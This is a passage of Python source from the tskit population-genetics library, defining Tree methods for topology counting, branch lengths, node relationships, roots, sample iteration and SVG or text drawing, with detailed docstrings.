(see :meth:`tskit.Tree.rank`) with ``num_leaves`` leaves.
The labels and times of internal nodes are assigned by a postorder
traversal of the nodes, such that the time of each internal node
is the maximum time of its children plus the specified ``branch_length``.
The time of each leaf is 0.
See the :ref:`sec_tree_ranks` section for details on ranking and
unranking trees and what constitutes valid ranks.
:param int num_leaves: The number of leaves of the tree to generate.
:param tuple(int) rank: The rank of the tree to generate.
:param float span: The genomic span of the returned tree. The tree will cover
the interval :math:`[0, \\text{span})` and the :attr:`~Tree.tree_sequence`
from which the tree is taken will have its
:attr:`~tskit.TreeSequence.sequence_length` equal to ``span``.
:param: float branch_length: The minimum length of a branch in this tree.
:rtype: Tree
:raises: ValueError: If the given rank is out of bounds for trees
with ``num_leaves`` leaves.
"""
rank_tree = combinatorics.RankTree.unrank(num_leaves, rank)
return rank_tree.to_tsk_tree(span=span, branch_length=branch_length)
def count_topologies(self, sample_sets=None):
"""
Calculates the distribution of embedded topologies for every combination
of the sample sets in ``sample_sets``. ``sample_sets`` defaults to all
samples in the tree grouped by population.
``sample_sets`` need not include all samples but must be pairwise disjoint.
The returned object is a :class:`tskit.TopologyCounter` that contains
counts of topologies per combination of sample sets. For example,
>>> topology_counter = tree.count_topologies()
>>> rank, count = topology_counter[0, 1, 2].most_common(1)[0]
produces the most common tree topology, with populations 0, 1
and 2 as its tips, according to the genealogies of those
populations' samples in this tree.
The counts for each topology in the :class:`tskit.TopologyCounter`
are absolute counts that we would get if we were to select all
combinations of samples from the relevant sample sets.
For sample sets :math:`[s_0, s_1, ..., s_n]`, the total number of
topologies for those sample sets is equal to
:math:`|s_0| * |s_1| * ... * |s_n|`, so the counts in the counter
``topology_counter[0, 1, ..., n]`` should sum to
:math:`|s_0| * |s_1| * ... * |s_n|`.
To convert the topology counts to probabilities, divide by the total
possible number of sample combinations from the sample sets in question::
>>> set_sizes = [len(sample_set) for sample_set in sample_sets]
>>> p = count / (set_sizes[0] * set_sizes[1] * set_sizes[2])
.. warning:: The interface for this method is preliminary and may be subject to
backwards incompatible changes in the near future.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
Defaults to all samples grouped by population.
:rtype: tskit.TopologyCounter
:raises ValueError: If nodes in ``sample_sets`` are invalid or are
internal samples.
"""
if sample_sets is None:
sample_sets = [
self.tree_sequence.samples(population=pop.id)
for pop in self.tree_sequence.populations()
]
return combinatorics.tree_count_topologies(self, sample_sets)
def get_branch_length(self, u):
# Deprecated alias for branch_length
return self.branch_length(u)
def branch_length(self, u):
"""
Returns the length of the branch (in units of time) joining the
specified node to its parent. This is equivalent to
>>> tree.time(tree.parent(u)) - tree.time(u)
The branch length for a node that has no parent (e.g., a root) is
defined as zero.
Note that this is not related to the property `.length` which
is a deprecated alias for the genomic :attr:`~Tree.span` covered by a tree.
:param int u: The node of interest.
:return: The branch length from u to its parent.
:rtype: float
"""
ret = 0
parent = self.parent(u)
if parent != NULL:
ret = self.time(parent) - self.time(u)
return ret
def get_total_branch_length(self):
# Deprecated alias for total_branch_length
return self.total_branch_length
@property
def total_branch_length(self):
"""
Returns the sum of all the branch lengths in this tree (in
units of time). This is equivalent to
>>> sum(tree.branch_length(u) for u in tree.nodes())
Note that the branch lengths for root nodes are defined as zero.
As this is defined by a traversal of the tree, technically we
return the sum of all branch lengths that are reachable from
roots. Thus, this is the sum of all branches that are ancestral
to at least one sample. This distinction is only important
in tree sequences that contain 'dead branches', i.e., those
that define topology not ancestral to any samples.
:return: The sum of lengths of branches in this tree.
:rtype: float
"""
return sum(self.branch_length(u) for u in self.nodes())
def get_mrca(self, u, v):
# Deprecated alias for mrca
return self.mrca(u, v)
def mrca(self, u, v):
"""
Returns the most recent common ancestor of the specified nodes.
:param int u: The first node.
:param int v: The second node.
:return: The most recent common ancestor of u and v.
:rtype: int
"""
return self._ll_tree.get_mrca(u, v)
def get_tmrca(self, u, v):
# Deprecated alias for tmrca
return self.tmrca(u, v)
def tmrca(self, u, v):
"""
Returns the time of the most recent common ancestor of the specified
nodes. This is equivalent to::
>>> tree.time(tree.mrca(u, v))
:param int u: The first node.
:param int v: The second node.
:return: The time of the most recent common ancestor of u and v.
:rtype: float
"""
return self.get_time(self.get_mrca(u, v))
def get_parent(self, u):
# Deprecated alias for parent
return self.parent(u)
def parent(self, u):
"""
Returns the parent of the specified node. Returns
:data:`tskit.NULL` if u is a root or is not a node in
the current tree.
:param int u: The node of interest.
:return: The parent of u.
:rtype: int
"""
return self._ll_tree.get_parent(u)
@property
def parent_array(self):
"""
A numpy array (dtype=np.int32) encoding the parent of each node
in this tree, such that ``tree.parent_array[u] == tree.parent(u)``
for all ``0 <= u < ts.num_nodes``. See the :meth:`~.parent`
method for details on the semantics of tree parents and the
:ref:`sec_data_model_tree_structure` section for information on the
quintuply linked tree encoding.
.. warning:: |tree_array_warning|
"""
return self._parent_array
# Quintuply linked tree structure.
def left_child(self, u):
"""
Returns the leftmost child of the specified node. Returns
:data:`tskit.NULL` if u is a leaf or is not a node in
the current tree. The left-to-right ordering of children
is arbitrary and should not be depended on; see the
:ref:`data model <sec_data_model_tree_structure>` section
for details.
This is a low-level method giving access to the quintuply linked
tree structure in memory; the :meth:`.children` method is a more
convenient way to obtain the children of a given node.
:param int u: The node of interest.
:return: The leftmost child of u.
:rtype: int
"""
return self._ll_tree.get_left_child(u)
@property
def left_child_array(self):
"""
A numpy array (dtype=np.int32) encoding the left child of each node
in this tree, such that ``tree.left_child_array[u] == tree.left_child(u)``
for all ``0 <= u < ts.num_nodes``. See the :meth:`~.left_child`
method for details on the semantics of tree left_child and the
:ref:`sec_data_model_tree_structure` section for information on the
quintuply linked tree encoding.
.. warning:: |tree_array_warning|
"""
return self._left_child_array
def right_child(self, u):
"""
Returns the rightmost child of the specified node. Returns
:data:`tskit.NULL` if u is a leaf or is not a node in
the current tree. The left-to-right ordering of children
is arbitrary and should not be depended on; see the
:ref:`data model <sec_data_model_tree_structure>` section
for details.
This is a low-level method giving access to the quintuply linked
tree structure in memory; the :meth:`.children` method is a more
convenient way to obtain the children of a given node.
:param int u: The node of interest.
:return: The rightmost child of u.
:rtype: int
"""
return self._ll_tree.get_right_child(u)
@property
def right_child_array(self):
"""
A numpy array (dtype=np.int32) encoding the right child of each node
in this tree, such that ``tree.right_child_array[u] == tree.right_child(u)``
for all ``0 <= u < ts.num_nodes``. See the :meth:`~.right_child`
method for details on the semantics of tree right_child and the
:ref:`sec_data_model_tree_structure` section for information on the
quintuply linked tree encoding.
.. warning:: |tree_array_warning|
"""
return self._right_child_array
def left_sib(self, u):
"""
Returns the sibling node to the left of u, or :data:`tskit.NULL`
if u does not have a left sibling.
The left-to-right ordering of children
is arbitrary and should not be depended on; see the
:ref:`data model <sec_data_model_tree_structure>` section
for details.
:param int u: The node of interest.
:return: The sibling node to the left of u.
:rtype: int
"""
return self._ll_tree.get_left_sib(u)
@property
def left_sib_array(self):
"""
A numpy array (dtype=np.int32) encoding the left sib of each node
in this tree, such that ``tree.left_sib_array[u] == tree.left_sib(u)``
for all ``0 <= u < ts.num_nodes``. See the :meth:`~.left_sib`
method for details on the semantics of tree left_sib and the
:ref:`sec_data_model_tree_structure` section for information on the
quintuply linked tree encoding.
.. warning:: |tree_array_warning|
"""
return self._left_sib_array
def right_sib(self, u):
"""
Returns the sibling node to the right of u, or :data:`tskit.NULL`
if u does not have a right sibling.
The left-to-right ordering of children
is arbitrary and should not be depended on; see the
:ref:`data model <sec_data_model_tree_structure>` section
for details.
:param int u: The node of interest.
:return: The sibling node to the right of u.
:rtype: int
"""
return self._ll_tree.get_right_sib(u)
@property
def right_sib_array(self):
"""
A numpy array (dtype=np.int32) encoding the right sib of each node
in this tree, such that ``tree.right_sib_array[u] == tree.right_sib(u)``
for all ``0 <= u < ts.num_nodes``. See the :meth:`~.right_sib`
method for details on the semantics of tree right_sib and the
:ref:`sec_data_model_tree_structure` section for information on the
quintuply linked tree encoding.
.. warning:: |tree_array_warning|
"""
return self._right_sib_array
# Sample list.
def left_sample(self, u):
return self._ll_tree.get_left_sample(u)
def right_sample(self, u):
return self._ll_tree.get_right_sample(u)
def next_sample(self, u):
return self._ll_tree.get_next_sample(u)
# TODO do we also have right_root?
@property
def left_root(self):
"""
The leftmost root in this tree. If there are multiple roots
in this tree, they are siblings of this node, and so we can
use :meth:`.right_sib` to iterate over all roots:
.. code-block:: python
u = tree.left_root
while u != tskit.NULL:
print("Root:", u)
u = tree.right_sib(u)
The left-to-right ordering of roots is arbitrary and should
not be depended on; see the
:ref:`data model <sec_data_model_tree_structure>`
section for details.
This is a low-level method giving access to the quintuply linked
tree structure in memory; the :attr:`~Tree.roots` attribute is a more
convenient way to obtain the roots of a tree. If you are assuming
that there is a single root in the tree you should use the
:attr:`~Tree.root` property.
.. warning:: Do not use this property if you are assuming that there
is a single root in trees that are being processed. The
:attr:`~Tree.root` property should be used in this case, as it will
raise an error when multiple roots exists.
:rtype: int
"""
return self._ll_tree.get_left_root()
def get_children(self, u):
# Deprecated alias for self.children
return self.children(u)
def children(self, u):
"""
Returns the children of the specified node ``u`` as a tuple of integer node IDs.
If ``u`` is a leaf, return the empty tuple. The ordering of children
is arbitrary and should not be depended on; see the
:ref:`data model <sec_data_model_tree_structure>` section
for details.
:param int u: The node of interest.
:return: The children of ``u`` as a tuple of integers
:rtype: tuple(int)
"""
return self._ll_tree.get_children(u)
def get_time(self, u):
# Deprecated alias for self.time
return self.time(u)
def time(self, u):
"""
Returns the time of the specified node.
Equivalent to ``tree.tree_sequence.node(u).time``.
:param int u: The node of interest.
:return: The time of u.
:rtype: float
"""
return self._ll_tree.get_time(u)
def depth(self, u):
"""
Returns the number of nodes on the path from ``u`` to a
root, not including ``u``. Thus, the depth of a root is
zero.
:param int u: The node of interest.
:return: The depth of u.
:rtype: int
"""
return self._ll_tree.depth(u)
def get_population(self, u):
# Deprecated alias for self.population
return self.population(u)
def population(self, u):
"""
Returns the population associated with the specified node.
Equivalent to ``tree.tree_sequence.node(u).population``.
:param int u: The node of interest.
:return: The ID of the population associated with node u.
:rtype: int
"""
return self._ll_tree.get_population(u)
def is_internal(self, u):
"""
Returns True if the specified node is not a leaf. A node is internal
if it has one or more children in the current tree.
:param int u: The node of interest.
:return: True if u is not a leaf node.
:rtype: bool
"""
return not self.is_leaf(u)
def is_leaf(self, u):
"""
Returns True if the specified node is a leaf. A node :math:`u` is a
leaf if it has zero children.
:param int u: The node of interest.
:return: True if u is a leaf node.
:rtype: bool
"""
return len(self.children(u)) == 0
def is_isolated(self, u):
"""
Returns True if the specified node is isolated in this tree: that is
it has no parents and no children. Sample nodes that are isolated
and have no mutations above them are used to represent
:ref:`missing data<sec_data_model_missing_data>`.
:param int u: The node of interest.
:return: True if u is an isolated node.
:rtype: bool
"""
return self.num_children(u) == 0 and self.parent(u) == NULL
def is_sample(self, u):
"""
Returns True if the specified node is a sample. A node :math:`u` is a
sample if it has been marked as a sample in the parent tree sequence.
:param int u: The node of interest.
:return: True if u is a sample.
:rtype: bool
"""
return bool(self._ll_tree.is_sample(u))
def is_descendant(self, u, v):
"""
Returns True if the specified node u is a descendant of node v and False
otherwise. A node :math:`u` is a descendant of another node :math:`v` if
:math:`v` is on the path from :math:`u` to root. A node is considered
to be a descendant of itself, so ``tree.is_descendant(u, u)`` will be
True for any valid node.
:param int u: The descendant node.
:param int v: The ancestral node.
:return: True if u is a descendant of v.
:rtype: bool
:raises ValueError: If u or v are not valid node IDs.
"""
return bool(self._ll_tree.is_descendant(u, v))
@property
def num_nodes(self):
"""
Returns the number of nodes in the :class:`TreeSequence` this tree is in.
Equivalent to ``tree.tree_sequence.num_nodes``. To find the number of
nodes that are reachable from all roots use ``len(list(tree.nodes()))``.
:rtype: int
"""
return self._ll_tree.get_num_nodes()
@property
def num_roots(self):
"""
The number of roots in this tree, as defined in the :attr:`~Tree.roots`
attribute.
Only requires O(number of roots) time.
:rtype: int
"""
return self._ll_tree.get_num_roots()
@property
def has_single_root(self):
"""
``True`` if this tree has a single root, ``False`` otherwise.
Equivalent to tree.num_roots == 1. This is a O(1) operation.
:rtype: bool
"""
root = self.left_root
if root != NULL and self.right_sib(root) == NULL:
return True
return False
@property
def has_multiple_roots(self):
"""
``True`` if this tree has more than one root, ``False`` otherwise.
Equivalent to tree.num_roots > 1. This is a O(1) operation.
:rtype: bool
"""
root = self.left_root
if root != NULL and self.right_sib(root) != NULL:
return True
return False
@property
def roots(self):
"""
The list of roots in this tree. A root is defined as a unique endpoint of
the paths starting at samples. We can define the set of roots as follows:
.. code-block:: python
roots = set()
for u in tree_sequence.samples():
while tree.parent(u) != tskit.NULL:
u = tree.parent(u)
roots.add(u)
# roots is now the set of all roots in this tree.
assert sorted(roots) == sorted(tree.roots)
The roots of the tree are returned in a list, in no particular order.
Only requires O(number of roots) time.
:return: The list of roots in this tree.
:rtype: list
"""
roots = []
u = self.left_root
while u != NULL:
roots.append(u)
u = self.right_sib(u)
return roots
def get_root(self):
# Deprecated alias for self.root
return self.root
@property
def root(self):
"""
The root of this tree. If the tree contains multiple roots, a ValueError is
raised indicating that the :attr:`~Tree.roots` attribute should be used instead.
:return: The root node.
:rtype: int
:raises: :class:`ValueError` if this tree contains more than one root.
"""
if self.has_multiple_roots:
raise ValueError("More than one root exists. Use tree.roots instead")
return self.left_root
def get_index(self):
# Deprecated alias for self.index
return self.index
@property
def index(self):
"""
Returns the index this tree occupies in the parent tree sequence.
This index is zero based, so the first tree in the sequence has index 0.
:return: The index of this tree.
:rtype: int
"""
return self._ll_tree.get_index()
def get_interval(self):
# Deprecated alias for self.interval
return self.interval
@property
def interval(self):
"""
Returns the coordinates of the genomic interval that this tree
represents the history of. The interval is returned as a tuple
:math:`(l, r)` and is a half-open interval such that the left
coordinate is inclusive and the right coordinate is exclusive. This
tree therefore applies to all genomic locations :math:`x` such that
:math:`l \\leq x < r`.
:return: A named tuple (l, r) representing the left-most (inclusive)
and right-most (exclusive) coordinates of the genomic region
covered by this tree. The coordinates can be accessed by index
(``0`` or ``1``) or equivalently by name (``.left`` or ``.right``)
:rtype: tuple
"""
return Interval(self._ll_tree.get_left(), self._ll_tree.get_right())
def get_length(self):
# Deprecated alias for self.span
return self.length
@property
def length(self):
# Deprecated alias for self.span
return self.span
@property
def span(self):
"""
Returns the genomic distance that this tree spans.
This is defined as :math:`r - l`, where :math:`(l, r)` is the genomic
interval returned by :attr:`~Tree.interval`.
:return: The genomic distance covered by this tree.
:rtype: float
"""
left, right = self.get_interval()
return right - left
# The sample_size (or num_samples) is really a property of the tree sequence,
# and so we should provide access to this via a tree.tree_sequence.num_samples
# property access. However, we can't just remove the method as a lot of code
# may depend on it. To complicate things a bit more, sample_size has been
# changed to num_samples elsewhere for consistency. We can't do this here
# because there is already a num_samples method which returns the number of
# samples below a particular node. The best thing to do is probably to
# undocument the sample_size property, but keep it around for ever.
def get_sample_size(self):
# Deprecated alias for self.sample_size
return self.sample_size
@property
def sample_size(self):
"""
Returns the sample size for this tree. This is the number of sample
nodes in the tree.
:return: The number of sample nodes in the tree.
:rtype: int
"""
return self._ll_tree.get_sample_size()
def draw_text(self, orientation=None, **kwargs):
orientation = drawing.check_orientation(orientation)
if orientation in (drawing.LEFT, drawing.RIGHT):
text_tree = drawing.HorizontalTextTree(
self, orientation=orientation, **kwargs
)
else:
text_tree = drawing.VerticalTextTree(
self, orientation=orientation, **kwargs
)
return str(text_tree)
def draw_svg(
self,
path=None,
*,
size=None,
tree_height_scale=None,
max_tree_height=None,
node_labels=None,
mutation_labels=None,
root_svg_attributes=None,
style=None,
order=None,
force_root_branch=None,
symbol_size=None,
x_axis=None,
x_label=None,
y_axis=None,
y_label=None,
y_ticks=None,
y_gridlines=None,
all_edge_mutations=None,
**kwargs,
):
"""
Return an SVG representation of a single tree. Sample nodes are represented as
black squares, other nodes are black circles, and mutations are red crosses,
although these default styles can be altered (see below). By default, numeric
labels are drawn beside nodes and mutations: these can be altered using the
``node_labels`` and ``mutation_labels`` parameters.
When working in a Jupyter notebook, use the ``IPython.display.SVG`` function
to display the SVG output from this function inline in the notebook::
>>> SVG(tree.draw_svg())
The elements in the tree are grouped according to the structure of the tree,
using `SVG groups <https://www.w3.org/TR/SVG2/struct.html#Groups>`_. This allows
easy styling and manipulation of elements and subtrees. Elements in the SVG file
are marked with SVG classes so that they can be targetted, allowing
different components of the drawing to be hidden, styled, or otherwise
manipulated. For example, when drawing (say) the first tree from a tree
sequence, all the SVG components will be placed in a group of class ``tree``.
The group will have the additional class ``t0``, indicating that this tree
has index 0 in the tree sequence. The general SVG structure is as follows:
The tree is contained in a group of class ``tree``. Additionally, this group
has a class ``tN`` where `N` is the tree index.
Within the ``tree`` group there is a nested hierarchy of groups corresponding
to the tree structure. Any particular node in the tree will have a corresponding
group containing child groups (if any) followed by the edge above that node, a
node symbol, and (potentially) text containing the node label. For example, a
simple two tip tree, with tip node ids 0 and 1, and a root node id of 2, and with
some bespoke labels, will have a structure similar to the following:
.. code-block::
<g class="tree t0">
<g class="node n2 root">
<g class="node n1 a2 i1 p1 sample leaf">
<path class="edge" ... />
<rect class="sym" ... />
<text class="lab" ...>Node 1</text>
</g>
<g class="node n0 a2 i2 p1 sample leaf">
<path class="edge" ... />
<rect class="sym" .../>
<text class="lab" ...>Node 0</text>
</g>
<path class="edge" ... />
<circle class="sym" ... />
<text class="lab">Root (Node 2)</text>
</g>
</g>
The classes can be used to manipulate the element, e.g. by using
`stylesheets <https://www.w3.org/TR/SVG2/styling.html>`_. Style strings can
be embedded in the svg by using the ``style`` parameter, or added to html
pages which contain the raw SVG (e.g. within a Jupyter notebook by using the
IPython ``HTML()`` function). As a simple example, passing the following
string as the ``style`` parameter will hide all labels:
.. code-block:: css
.tree .lab {visibility: hidden}
You can also change the format of various items: in SVG2-compatible viewers,
the following styles will rotate the leaf nodes labels by 90 degrees, colour
the leaf node symbols blue, and
hide the non-sample node labels. Note that SVG1.1 does not recognize the
``transform`` style, so in some SVG viewers, the labels will not appear rotated:
a workaround is to convert the SVG to PDF first, using e.g. the programmable
chromium engine: ``chromium --headless --print-to-pdf=out.pdf in.svg``)
.. code-block:: css
.tree .node.leaf > .lab {
transform: translateY(0.5em) rotate(90deg); text-anchor: start}
.tree .node.leaf > .sym {fill: blue}
.tree .node:not(.sample) > .lab {visibility: hidden}
Nodes contain classes that allow them to be targetted by node id (``nX``),
ancestor (parent) id (``aX`` or ``root`` if this node has no parent), and
(if defined) the id of the individual (``iX``) and population (``pX``) to
which this node belongs. Hence the following style will display
a large symbol for node 10, coloured red with a black border, and will also use
thick red lines for all the edges that have it as a direct or indirect parent
(note that, as with the ``transform`` style, changing the geometrical size of
symbols is only possible in SVG2 and above and therefore not all SVG viewers
will render such symbol size changes correctly).
.. code-block:: css
.tree .node.n10 > .sym {fill: red; stroke: black; r: 8px}
.tree .node.a10 .edge {stroke: red; stroke-width: 2px}
.. note::
A feature of SVG style commands is that they apply not just to the contents
within the <svg> container, but to the entire file. Thus if an SVG file is
embedded in a larger document, such as an HTML file (e.g. when an SVG
is displayed inline in a Jupyter notebook), the style will apply to all SVG
drawings in the notebook. To avoid this, you can tag the SVG with a unique
SVG using ``root_svg_attributes={'id':'MY_UID'}``, and prepend this to the
style string, as in ``#MY_UID .tree .edges {stroke: gray}``.
:param str path: The path to the file to write the output. If None, do not
write to file.
:param size: A tuple of (width, height) giving the width and height of the
produced SVG drawing in abstract user units (usually interpreted as pixels on
initial display).
:type size: tuple(int, int)
:param str tree_height_scale: Control how height values for nodes are computed.
If this is equal to ``"time"`` (the default), node heights are proportional
to their time values. If this is equal to ``"log_time"``, node heights are
proportional to their log(time) values. If it is equal to ``"rank"``, node
heights are spaced equally according to their ranked times.
:param str,float max_tree_height: The maximum tree height value in the current
scaling system (see ``tree_height_scale``). Can be either a string or a
numeric value. If equal to ``"tree"`` (the default), the maximum tree height
is set to be that of the oldest root in the tree. If equal to ``"ts"`` the
maximum height is set to be the height of the oldest root in the tree
sequence; this is useful when drawing trees from the same tree sequence as it
ensures that node heights are consistent. If a numeric value, this is used as
the maximum tree height by which to scale other nodes.
:param node_labels: If specified, show custom labels for the nodes
(specified by ID) that are present in this map; any nodes not present will
not have a label.
:type node_labels: dict(int, str)
:param mutation_labels: If specified, show custom labels for the
mutations (specified by ID) that are present in the map; any mutations
not present will not have a label.
:type mutation_labels: dict(int, str)
:param dict root_svg_attributes: Additional attributes, such as an id, that will
be embedded in the root ``<svg>`` tag of the generated drawing.
:param str style: A
`css style string <https://www.w3.org/TR/CSS22/syndata.html>`_ that will be
included in the ``<style>`` tag of the generated svg. Note that certain
styles, in particular transformations and changes in geometrical properties
of objects, will only be recognised by SVG2-compatible viewers.
:param str order: A string specifying the traversal type used to order the tips
in the tree, as detailed in :meth:`Tree.nodes`. If None (default), use
the default order as described in that method.
:param bool force_root_branch: If ``True`` always plot a branch (edge) above the
root(s) in the tree. If ``None`` (default) then only plot such root branches
if there is a mutation above a root of the tree.
:param float symbol_size: Change the default size of the node and mutation
plotting symbols. If ``None`` (default) use a standard size.
:param bool x_axis: Should the plot have an X axis line, showing the start and
end position of this tree along the genome. If ``None`` (default) do not
plot an X axis.
:param str x_label: Place a label under the plot. If ``None`` (default) and
there is an X axis, create and place an appropriate label.
:param bool y_axis: Should the plot have an Y axis line, showing time (or
ranked node time if ``tree_height_scale="rank"``). If ``None`` (default)
do not plot a Y axis.
:param str y_label: Place a label to the left of the plot. If ``None`` (default)
and there is a Y axis, create and place an appropriate label.
:param list y_ticks: A list of Y values at which to plot tickmarks (``[]``
gives no tickmarks). If ``None``, plot one tickmark for each unique
node value.
:param bool y_gridlines: Whether to plot horizontal lines behind the tree
at each y tickmark.
:param bool all_edge_mutations: The edge on which a mutation occurs may span
multiple trees. If ``False`` or ``None`` (default) mutations are only drawn
on an edge if their site position exists within the genomic interval covered
by this tree. If ``True``, all mutations on each edge of the tree are drawn,
even if the their genomic position is to the left or right of the tree
itself (by default these "extra" mutations are drawn in a different colour).
Note that this means that independent drawings of different trees
from the same tree sequence may share some plotted mutations.
:return: An SVG representation of a tree.
:rtype: str
"""
draw = drawing.SvgTree(
self,
size,
tree_height_scale=tree_height_scale,
max_tree_height=max_tree_height,
node_labels=node_labels,
mutation_labels=mutation_labels,
root_svg_attributes=root_svg_attributes,
style=style,
order=order,
force_root_branch=force_root_branch,
symbol_size=symbol_size,
x_axis=x_axis,
x_label=x_label,
y_axis=y_axis,
y_label=y_label,
y_ticks=y_ticks,
y_gridlines=y_gridlines,
all_edge_mutations=all_edge_mutations,
**kwargs,
)
output = draw.drawing.tostring()
if path is not None:
# TODO: removed the pretty here when this is stable.
draw.drawing.saveas(path, pretty=True)
return output
def draw(
self,
path=None,
width=None,
height=None,
node_labels=None,
node_colours=None,
mutation_labels=None,
mutation_colours=None,
format=None, # noqa A002
edge_colours=None,
tree_height_scale=None,
max_tree_height=None,
order=None,
):
"""
Returns a drawing of this tree.
When working in a Jupyter notebook, use the ``IPython.display.SVG``
function to display the SVG output from this function inline in the notebook::
>>> SVG(tree.draw())
The unicode format uses unicode `box drawing characters
<https://en.wikipedia.org/wiki/Box-drawing_character>`_ to render the tree.
This allows rendered trees to be printed out to the terminal::
>>> print(tree.draw(format="unicode"))
6
┏━┻━┓
┃ 5
┃ ┏━┻┓
┃ ┃ 4
┃ ┃ ┏┻┓
3 0 1 2
The ``node_labels`` argument allows the user to specify custom labels
for nodes, or no labels at all::
>>> print(tree.draw(format="unicode", node_labels={}))
┃
┏━┻━┓
┃ ┃
┃ ┏━┻┓
┃ ┃ ┃
┃ ┃ ┏┻┓
┃ ┃ ┃ ┃
Note: in some environments such as Jupyter notebooks with Windows or Mac,
users have observed that the Unicode box drawings can be misaligned. In
these cases, we recommend using the SVG or ASCII display formats instead.
If you have a strong preference for aligned Unicode, you can try out the
solution documented
`here <https://github.com/tskit-dev/tskit/issues/189#issuecomment-499114811>`_.
:param str path: The path to the file to write the output. If None, do not
write to file.
:param int width: The width of the image in pixels. If not specified, either
defaults to the minimum size required to depict the tree (text formats)
or 200 pixels.
:param int height: The height of the image in pixels. If not specified, either
defaults to the minimum size required to depict the tree (text formats)
or 200 pixels.
:param dict node_labels: If specified, show custom labels for the nodes
that are present in the map. Any nodes not specified in the map will
not have a node label.
:param dict node_colours: If specified, show custom colours for the nodes
given in the map. Any nodes not specified in the map will take the default
colour; a value of ``None`` is treated as transparent and hence the node
symbol is not plotted. (Only supported in the SVG format.)
:param dict mutation_labels: If specified, show custom labels for the mutations
(specified by ID) that are present in the map. Any mutations not in the map
will not have a label. (Showing mutations is currently only supported in the
SVG format)
:param dict mutation_colours: If specified, show custom colours for the mutations
given in the map (specified by ID). As for ``node_colours``, mutations not
present in the map take the default colour, and those mapping to ``None``
are not drawn. (Only supported in the SVG format.)
:param str format: The format of the returned image. Currently supported
are 'svg', 'ascii' and 'unicode'. Note that the :meth:`Tree.draw_svg`
method provides more comprehensive functionality for creating SVGs.
:param dict edge_colours: If specified, show custom colours for the edge
joining each node in the map to its parent. As for ``node_colours``,
unspecified edges take the default colour, and ``None`` values result in the
edge being omitted. (Only supported in the SVG format.)
:param str tree_height_scale: Control how height values for nodes are computed.
If this is equal to ``"time"``, node heights are proportional to their time
values. If this is equal to ``"log_time"``, node heights are proportional to
their log(time) values. If it is equal to ``"rank"``, node heights are spaced
equally according to their ranked times. For SVG output the default is
'time'-scale whereas for text output the default is 'rank'-scale.
Time scaling is not currently supported for text output.
:param str,float max_tree_height: The maximum tree height value in the current
scaling system (see ``tree_height_scale``). Can be either a string or a
numeric value. If equal to ``"tree"``, the maximum tree height is set to be
that of the oldest root in the tree. If equal to ``"ts"`` the maximum
height is set to be the height of the oldest root in the tree sequence;
this is useful when drawing trees from the same tree sequence as it ensures
that node heights are consistent. If a numeric value, this is used as the
maximum tree height by which to scale other nodes. This parameter
is not currently supported for text output.
:param str order: The left-to-right ordering of child nodes in the drawn tree.
This can be either: ``"minlex"``, which minimises the differences
between adjacent trees (see also the ``"minlex_postorder"`` traversal
order for the :meth:`.nodes` method); or ``"tree"`` which draws trees
in the left-to-right order defined by the
:ref:`quintuply linked tree structure <sec_data_model_tree_structure>`.
If not specified or None, this defaults to ``"minlex"``.
:return: A representation of this tree in the requested format.
:rtype: str
"""
output = drawing.draw_tree(
self,
format=format,
width=width,
height=height,
node_labels=node_labels,
node_colours=node_colours,
mutation_labels=mutation_labels,
mutation_colours=mutation_colours,
edge_colours=edge_colours,
tree_height_scale=tree_height_scale,
max_tree_height=max_tree_height,
order=order,
)
if path is not None:
with open(path, "w") as f:
f.write(output)
return output
def get_num_mutations(self):
return self.num_mutations
@property
def num_mutations(self):
"""
Returns the total number of mutations across all sites on this tree.
:return: The total number of mutations over all sites on this tree.
:rtype: int
"""
return sum(len(site.mutations) for site in self.sites())
@property
def num_sites(self):
"""
Returns the number of sites on this tree.
:return: The number of sites on this tree.
:rtype: int
"""
return self._ll_tree.get_num_sites()
def sites(self):
"""
Returns an iterator over all the :ref:`sites <sec_site_table_definition>`
in this tree. Sites are returned in order of increasing ID
(and also position). See the :class:`Site` class for details on
the available fields for each site.
:return: An iterator over all sites in this tree.
"""
# TODO change the low-level API to just return the IDs of the sites.
for ll_site in self._ll_tree.get_sites():
_, _, _, id_, _ = ll_site
yield self.tree_sequence.site(id_)
def mutations(self):
"""
Returns an iterator over all the
:ref:`mutations <sec_mutation_table_definition>` in this tree.
Mutations are returned in their
:ref:`order in the mutations table<sec_mutation_requirements>`,
that is, by nondecreasing site ID, and within a site, by decreasing
mutation time with parent mutations before their children.
See the :class:`Mutation` class for details on the available fields for
each mutation.
The returned iterator is equivalent to iterating over all sites
and all mutations in each site, i.e.::
>>> for site in tree.sites():
>>> for mutation in site.mutations:
>>> yield mutation
:return: An iterator over all :class:`Mutation` objects in this tree.
:rtype: iter(:class:`Mutation`)
"""
for site in self.sites():
yield from site.mutations
def get_leaves(self, u):
# Deprecated alias for samples. See the discussion in the get_num_leaves
# method for why this method is here and why it is semantically incorrect.
# The 'leaves' iterator below correctly returns the leaves below a given
# node.
return self.samples(u)
def leaves(self, u=None):
"""
Returns an iterator over all the leaves in this tree that are
underneath the specified node. If u is not specified, return all leaves
in the tree.
:param int u: The node of interest.
:return: An iterator over all leaves in the subtree rooted at u.
:rtype: collections.abc.Iterable
"""
roots = [u]
if u is None:
roots = self.roots
for root in roots:
for v in self.nodes(root):
if self.is_leaf(v):
yield v
def _sample_generator(self, u):
if self._ll_tree.get_options() & _tskit.SAMPLE_LISTS:
samples = self.tree_sequence.samples()
index = self.left_sample(u)
if index != NULL:
stop = self.right_sample(u)
while True:
yield samples[index]
if index == stop:
break
index = self.next_sample(index)
else:
# Fall back on iterating over all nodes in the tree, yielding
# samples as we see them.
for v in self.nodes(u):
if self.is_sample(v):
yield v
def samples(self, u=None):
"""
Returns an iterator over the numerical IDs of all the sample nodes in
this tree that are underneath node ``u``. If ``u`` is a sample, it is
included in the returned iterator. If u is not specified, return all
sample node IDs in the tree.
If the :meth:`TreeSequence.trees` method is called with
``sample_lists=True``, this method uses an efficient algorithm to find
the sample nodes. If not, a simple traversal based method is used.
.. note::
The iterator is *not* guaranteed to return the sample node IDs in
numerical or any other particular order.
:param int u: The node of interest.
:return: An iterator over all sample node IDs in the subtree rooted at u.
:rtype: collections.abc.Iterable
"""
roots = [u]
if u is None:
roots = self.roots
for root in roots:
yield from self._sample_generator(root)
def num_children(self, u):
"""
Returns the number of children of the specified
node (i.e. ``len(tree.children(u))``)
:param int u: The node of interest.
:return: The number of immediate children of the node u in this tree.
:rtype: int
"""
return self._ll_tree.get_num_children(u)
def get_num_leaves(self, u):
# Deprecated alias for num_samples. The method name is inaccurate
